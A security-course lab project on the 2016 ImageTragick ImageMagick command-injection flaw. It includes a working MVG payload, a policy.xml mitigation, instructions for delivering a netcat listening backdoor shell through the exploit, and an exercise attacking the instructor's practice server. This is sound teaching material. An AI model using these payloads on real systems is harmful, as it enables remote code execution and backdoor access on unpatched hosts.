Proj X19: Exploiting ImageMagick (Up to 30 pts.)

Purpose

This is a very simple exploit that was made public on May 4, 2016. It's a code injection vulnerability, caused by software that takes user input and uses it to construct a command line.

What You Need

A Kali 2 machine, real or virtual

Task 1: Proof of Concept (5 pts.)

Checking ImageMagick Version

This bug has been patched, so if you have recently updated, your version may not be vulnerable. To check your version, in a Kali Terminal window, execute this command:

convert -version

When I did it, my version was "ImageMagick 6.8.9-9", as shown below. This version is vulnerable. If you see a different version number, check the Sources at the bottom of this project to see if it's vulnerable.

Creating the Exploit File

In a Kali Terminal window, execute this command:

nano exploit.mvg

In nano, enter the code shown below. Notice the mismatched single-quotes and double-quotes and the https URL that won't resolve. The vulnerability is in the https processor, and the payload of this exploit is the "ls -la" at the end.

push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com"|ls "-la)' pop graphic-context

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:

convert exploit.mvg out.png

The "ls -la" command executes, listing the files in your working directory, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown in the image above:

A convert command followed by a filename ending in .mvg
A file listing showing the same filename ending in .mvg with a Date

Save a whole-desktop image, using a filename of "Proj X19a from YOUR NAME".

Task 2: Mitigation (5 pts.)

This mitigation prevents the exploits by disabling the vulnerable ImageMagick coders.

In a Kali Terminal window, execute this command:

nano /etc/ImageMagick-6/policy.xml

Scroll down to find the policymap section, as shown below.

Place your cursor under the <policymap> line and press the Enter key a few times to make some room, as shown below.

Insert the lines shown below in the blank region you just created.

<policy domain="coder" rights="none" pattern="EPHEMERAL" /> <policy domain="coder" rights="none" pattern="URL" /> <policy domain="coder" rights="none" pattern="HTTPS" /> <policy domain="coder" rights="none" pattern="MVG" /> <policy domain="coder" rights="none" pattern="MSL" />

Press Ctrl+X, Y, Enter to save the file. In a Kali Terminal window, execute this code:

convert exploit.mvg out.png

The "ls -la" command does not execute. Instead, you see a "convert: not authorized" message, as shown below.

Saving the Screen Image

Make sure you can see the "convert: not authorized" message, as shown in the image above.

Save a whole-desktop image, using a filename of "Proj X19b from YOUR NAME".

Task 3: Listening Shell (10 pts.)

First, undo the Mitigation above, so your ImageMagick is vulnerable again.

Then create a malicious file named shell.mvg that opens a listening backdoor shell. You may find this document helpful:

SANS Netcat Cheat Sheet

In a Kali Terminal window, execute this code:

convert shell.mvg out.png

Open a second a Kali Terminal window, and execute this code:

netstat -pant

You should see a nc process LISTEN, as shown below.

Saving the Screen Image

Make sure you can see these two required items:

A convert command running
A LISTEN process with a Program Name of nc

Save a whole-desktop image, using a filename of "Proj X19c from YOUR NAME".

Hints
First refer to the cheat sheet and figure out how to make a netcat listening shell. Test it by typing it into a Terminal.
Then create a bash shell script that runs your netcat shell. This makes the exploit simpler because you don't need to pass in any parameters.
Then copy and modify the exploit file above to run your shell script instead of "ls -al".

Connecting from Another Machine

On another computer, such as the host of your virtual Kali Linux machine, use nc or Ncat to connect to the listening shell and verify that you have remote control of your Kali machine, as shown below.

Task 4: Exploit My Vulnerable Server (10 pts.)

Go to this URL:

http://attack32.samsclass.info/im.htm

Get your name on the Winners page. Send in a screenshot like the one below.

Hints
You need to figure out how to execute commands with spaces and switches in them. Start with your own Kali box, as you did above, and modify the exploit file until you can execute a command like this:
ls -a -l
Once you have that working, make an exploit file that executes a command like this:
echo SAM-TESTING>/tmp/foo
Run that exploit on your own Kali machine. Verify its success with this command:
cat /tmp/foo
Then exploit my server.

Turning In Your Project

Email the image to cnit.123@gmail.com with a subject of "Project X19 from YOUR NAME".

Sources

PoC Code from Openwall
ImageTragick

Posted 5-4-16 by Sam Bowne